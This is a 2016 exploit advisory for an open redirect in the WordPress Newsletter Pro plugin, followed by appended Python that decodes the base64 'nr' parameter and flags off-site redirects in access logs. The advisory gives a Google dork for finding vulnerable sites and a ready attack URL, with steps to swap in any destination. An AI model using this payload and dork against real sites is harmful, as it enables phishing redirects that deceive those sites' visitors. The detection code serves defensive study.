-----------------------------------------------------------
Exploit Title   : Wordpress Newsletter Pro Plugin Open Redirect
Exploit Author  : Ashiyane Digital Security Team
Vendor Homepage : http://www.thenewsletterplugin.com/downloads
Google Dork     : inurl:newsletter-pro/do.php
Date            : 06 Feb. 2016
Tested On       : Win 10 | CyberFox Browser & Kali Linux | IceWeasel
Version         : 2.5.3.3
-----------------------------------------------------------

Vulnerable PHP File  = newsletter-pro/do.php
Vulnerable Parameter = nr

How To Attack :

Attack Like = site.com/wp-content/plugins/newsletter-pro/do.php?a=r&nr=NTI7MDtodHRwOi8vZ29vZ2xlLmNvbTtodHRwOi8vZ29vZ2xlLmNvbQ==

The nr parameter must be base64 encoded.

If you decode it, you can add your URL after Something;Something;Something; and encode it again.

For example: NTI7MDtodHRwOi8vZ29vZ2xlLmNvbTtodHRwOi8vZ29vZ2xlLmNvbQ== decodes to 52;0;http://google.com;http://google.com

-----------------------------------------------------------

Demos :

-----------------------------------------------------------

Discovered by : Ac!D
tnQ : H.empire , M.hidden , M.hacking , Sh.BlackHAT , V for vendetta , Sh.Cloner & Hassan
-----------------------------------------------------------
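As an added example (not part of the advisory or the plugin's code), a small Python log scanner that decodes the nr parameter exactly as the advisory describes (base64, fields separated by ';') and flags do.php?a=r requests whose URL fields point at a host other than the site's own; the trusted host list, the log lines and the encode_nr helper are constructed assumptions.

```python
import base64
from urllib.parse import unquote, urlsplit

# From the advisory: this nr value decodes to "52;0;http://google.com;http://google.com".
ADVISORY_NR = "NTI7MDtodHRwOi8vZ29vZ2xlLmNvbTtodHRwOi8vZ29vZ2xlLmNvbQ=="
TRUSTED_HOSTS = {"site.com", "www.site.com"}  # assumed: the blog's own hosts

def encode_nr(fields):
    """Build an nr value as the advisory describes: join on ';', then base64."""
    return base64.b64encode(";".join(fields).encode()).decode()

def decode_nr(nr):
    """Split a base64 nr value into its ';' fields; None if it is not valid base64."""
    try:
        return base64.b64decode(nr, validate=True).decode("utf-8").split(";")
    except ValueError:  # bad alphabet/padding (binascii.Error) or non-UTF-8 bytes
        return None

def is_open_redirect(nr, trusted_hosts=TRUSTED_HOSTS):
    """True when any URL field inside nr points at a host outside trusted_hosts."""
    for field in decode_nr(nr) or []:
        if field.startswith(("http://", "https://")):
            host = (urlsplit(field).hostname or "").lower()
            if host not in trusted_hosts:
                return True
    return False

def query_params(query):
    """Minimal query parser that keeps '+' literal (it is part of the base64 alphabet)."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")  # first '=' only, so base64 padding survives
        params.setdefault(unquote(key), []).append(unquote(value))
    return params

def flag_log_lines(lines, trusted_hosts=TRUSTED_HOSTS):
    """Return access-log lines that request do.php?a=r with an off-site nr target."""
    hits = []
    for line in lines:
        parts = line.split()  # common log format: field 6 is the request target
        target = urlsplit(parts[6]) if len(parts) > 6 else urlsplit("")
        params = query_params(target.query)
        if (target.path.endswith("/newsletter-pro/do.php") and params.get("a") == ["r"]
                and "nr" in params and is_open_redirect(params["nr"][0], trusted_hosts)):
            hits.append(line)
    return hits

# Constructed sample log: a same-site redirect (benign) and the advisory's off-site one.
LOG_FMT = '203.0.113.%d - - [06/Feb/2016:10:00:00 +0000] "GET /wp-content/plugins/newsletter-pro/do.php?a=r&nr=%s HTTP/1.1" 302 0'
SAMPLE_LOG = [LOG_FMT % (5, encode_nr(["52", "0", "http://site.com/a", "http://site.com/b"])), LOG_FMT % (7, ADVISORY_NR)]
```

Running flag_log_lines(SAMPLE_LOG) returns only the second line, the one carrying the advisory's google.com payload.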